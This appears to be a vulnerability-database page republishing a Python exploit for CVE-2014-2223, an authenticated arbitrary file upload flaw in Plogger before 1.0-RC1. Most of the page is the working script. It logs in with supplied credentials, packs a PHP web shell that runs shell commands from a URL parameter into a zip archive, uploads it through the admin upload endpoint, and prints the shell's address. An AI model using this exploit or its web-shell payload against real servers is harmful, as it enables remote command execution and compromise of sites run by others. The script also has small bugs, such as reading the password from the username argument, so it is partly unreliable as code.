Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtB0z1337DAY-ID-22556
HistoryAug 28, 2014 - 12:00 a.m.

Plogger 1.0-RC1 - Authenticated Arbitrary File Upload Exploit

2014-08-2800:00:00
b0z
0day.today
16

EPSS

0.218

Percentile

96.6%

JSON

Plogger versions prior to 1.0-RC1 suffer from a remote authenticated arbitrary file upload vulnerability.

#!/usr/bin/env python
 
 
# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223
 
import hashlib
import os
import zipfile
 
import requests
import time
import argparse
 
 
 
def login(session,host,username,password):
    print "[+] Log in"
 
    session.post('http://%s/plog-admin/plog-upload.php' % host, data={
        "plog_username": username,
        "plog_password": password,
        "action": "log_in"
    })
 
def upload(session):
    print "[+] Creating poisoned gift"
    ## Write the backdoor
    backdoor = open(magic + '.php', 'w+', buffering = 0)
    backdoor.write("<?php system($_GET['cmd']) ?>")
    backdoor.close
 
    # Add true image file to block the race condition (mandatory not null)
    image = open(magic + '.png', 'w+', buffering = 0)
    image.write('A')
    image.close
 
    gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
    gift.write(magic + '.php')
    gift.write(magic + '.png')
    gift.close
 
    os.remove(magic + '.php')
    os.remove(magic + '.png')
 
    gift = open(magic + '.zip', 'rb')
    files= { "userfile": ("archive.zip", gift)}
    session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
        data = {
            "destination_radio":"existing",
            "albums_menu" : "1",
            "new_album_name":"",
            "collections_menu":"1",
            "upload":"Upload"
    })
 
    os.remove(magic + '.zip')
    print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)
 
if __name__== "__main__":
 
    parser = argparse.ArgumentParser()
    parser.add_argument("--host"        , help="Remote host",required=True)
    parser.add_argument("--user"        , help="Username",required=True)
    parser.add_argument("--password"    , help="Password",required=True)
    args = parser.parse_args()
 
    host     = args.host
    username = args.user
    password = args.user
 
    magic = hashlib.sha1(time.asctime()).hexdigest()
 
    session = requests.session()
    login(session,host,username,password)
    upload(session)

#  0day.today [2018-03-05]  #

Related

packetstorm 1
exploitdb 1
cvelist 1
prion 1
cve 1
nvd 1
packetstorm
packetstorm
Plogger Authenticated Arbitrary File Upload
2014-08-28 00:00:00
exploitdb
exploitdb
Plogger 1.0-RC1 - (Authenticated) Arbitrary File Upload
2014-08-28 00:00:00
cvelist
cvelist
CVE-2014-2223
2014-09-11 14:00:00
prion
prion
Unrestricted file upload
2014-09-11 14:16:00
cve
cve
CVE-2014-2223
2014-09-11 14:16:04
nvd
nvd
CVE-2014-2223
2014-09-11 14:16:04

EPSS

0.218

Percentile

96.6%

JSON
Related for 1337DAY-ID-22556
packetstorm1exploitdb1cvelist1prion1cve1nvd1